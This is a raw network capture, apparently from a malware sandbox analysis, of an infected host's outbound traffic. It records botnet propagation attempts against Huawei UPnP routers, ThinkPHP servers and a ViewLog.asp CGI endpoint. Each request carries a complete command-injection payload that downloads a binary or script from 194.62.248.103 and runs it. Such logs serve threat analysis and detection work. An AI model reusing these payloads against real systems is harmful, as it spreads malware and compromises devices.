                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Apr 14, 2024 16:35:18.661174059 CEST182INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/xml; charset="utf-8"
                                                        Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                        EXT:
                                                        Connection: Keep-Alive
                                                        Content-Length: 398


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.233318495.100.126.18680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.402523041 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:18.725919008 CEST579INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 357
                                                        Expires: Sun, 14 Apr 2024 14:35:18 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:18 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 62 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 38 26 23 34 36 3b 61 38 62 32 63 34 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 62 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 38 26 23 34 36 3b 61 38 62 32 63 34 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5b757b5c&#46;1713105318&#46;a8b2c4<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;5b757b5c&#46;1713105318&#46;a8b2c4</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.234739495.129.213.25380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.403549910 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:18.728085995 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:18 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.235291895.86.97.21380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.432008028 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:20.258879900 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.233884685.26.230.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.532164097 CEST236INHTTP/1.0 400 Bad Request
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 18:18:25 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.235673894.244.36.208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:19.245616913 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:20.898701906 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.850625038 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.913877964 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:34.848992109 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:50.462750912 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.970069885 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.234597494.122.196.338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:19.263945103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.235971094.122.86.198080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:19.264357090 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.233793095.101.216.6680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:20.054295063 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:20.371381044 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:20 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:20 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 32 30 26 23 34 36 3b 61 66 35 33 66 39 32 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 35 30 62 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 32 30 26 23 34 36 3b 61 66 35 33 66 39 32 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;650b1502&#46;1713105320&#46;af53f92<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;650b1502&#46;1713105320&#46;af53f92</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.234373494.112.164.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:20.598004103 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.234170288.245.209.21480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:20.714232922 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:21.156774044 CEST101INHTTP/1.1 404 Not Found
                                                        Content-type: text/html
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.2357558112.125.190.14580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:21.365603924 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:21.683646917 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:23 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.233743688.218.206.880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.105871916 CEST33INData Raw: 65 20 3a 21 75 48 5f 3c 6b 33 63 48 2c 70 3b 3a 2a 53 33 0d 0a
                                                        Data Ascii: e :!uH_<k3cH,p;:*S3


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.234378894.242.231.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.107585907 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.235627894.16.110.78080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.246922970 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.550932884 CEST498INHTTP/1.1 401
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        X-Frame-Options: DENY
                                                        Content-Length: 193
                                                        Date: Sun, 14 Apr 2024 14:35:22 GMT
                                                        Keep-Alive: timeout=60
                                                        Connection: keep-alive
                                                        Data Raw: 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 20 50 6c 65 61 73 65 20 70 72 6f 76 69 64 65 20 61 20 58 2d 41 50 49 2d 4b 45 59 20 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 2e 0a 54 68 69 73 20 69 73 20 66 6f 75 6e 64 20 69 6e 20 53 65 74 74 69 6e 67 73 20 2d 3e 20 41 63 63 6f 75 6e 74 20 53 65 74 74 69 6e 67 73 20 2d 3e 20 41 50 49 20 4b 65 79 0a 41 6c 74 65 72 6e 61 74 69 76 6c 79 20 79 6f 75 20 63 61 6e 20 64 69 73 61 62 6c 65 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 69 66 20 74 68 69 73 20 69 73 20 75 6e 65 78 70 65 63 74 65 64
                                                        Data Ascii: Authentication required. Please provide a X-API-KEY in request header.This is found in Settings -> Account Settings -> API KeyAlternativly you can disable authentication if this is unexpected


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.234863231.136.173.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.260901928 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:23.234554052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:25.190236092 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
